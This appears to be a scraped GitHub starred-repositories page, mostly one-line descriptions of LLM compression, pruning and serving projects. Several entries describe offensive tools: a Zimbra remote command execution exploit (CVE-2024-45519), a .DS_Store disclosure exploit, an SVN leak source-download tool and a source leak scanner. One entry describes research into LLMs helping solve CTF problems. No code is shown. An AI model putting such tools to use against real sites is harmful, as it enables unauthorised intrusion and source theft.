-
China
Stars
Zimbra - Remote Command Execution (CVE-2024-45519)
A .DS_Store file disclosure exploit. It parses .DS_Store file and downloads files recursively.
一个Svn信息泄露辅助工具,可以使用这个脚本列取网站目录,读取源码文件以及下载整站代码。
We want to see whether ChatGPT or other AI-LLM (Microsoft New_Bing or Google Bard) are able to help the user to go to some test environment to run cmds to solve the CTF problems (Whether the AI lar…
Multi-architecture assembler for IDA Pro. Powered by Keystone Engine.
整理开源的中文大语言模型,以规模较小、可私有化部署、训练成本较低的模型为主,包括底座模型,垂直领域微调及应用,数据集与教程等。
Chatbot Ollama is an open source chat UI for Ollama.
Get up and running with Llama 3.3, Mistral, Gemma 2, and other large language models.
🐛 A multi threads web application source leak scanner
[EMNLP 2024 Industry Track] This is the official PyTorch implementation of "LLMC: Benchmarking Large Language Model Quantization with a Versatile Compression Toolkit".
Neuron Merging: Compensating for Pruned Neurons (NeurIPS 2020)
Code for paper "EBFT: Effective and Block-Wise Fine-Tuning for Sparse LLMs"
This repository contains code to quantitatively evaluate instruction-tuned models such as Alpaca and Flan-T5 on held-out tasks.
Official style files for papers submitted to venues of the Association for Computational Linguistics
Official Pytorch Implementation of Our Paper Accepted at ICLR 2024-- Dynamic Sparse No Training: Training-Free Fine-tuning for Sparse LLMs
[AAAI 2024] Fluctuation-based Adaptive Structured Pruning for Large Language Models
Implementation of "Gradients without backpropagation" paper (https://arxiv.org/abs/2202.08587) using functorch
✨✨Latest Advances on Multimodal Large Language Models
A high-throughput and memory-efficient inference and serving engine for LLMs
This is a collection of our research on efficient AI, covering hardware-aware NAS and model compression.
[ICLR 2024] Sheared LLaMA: Accelerating Language Model Pre-training via Structured Pruning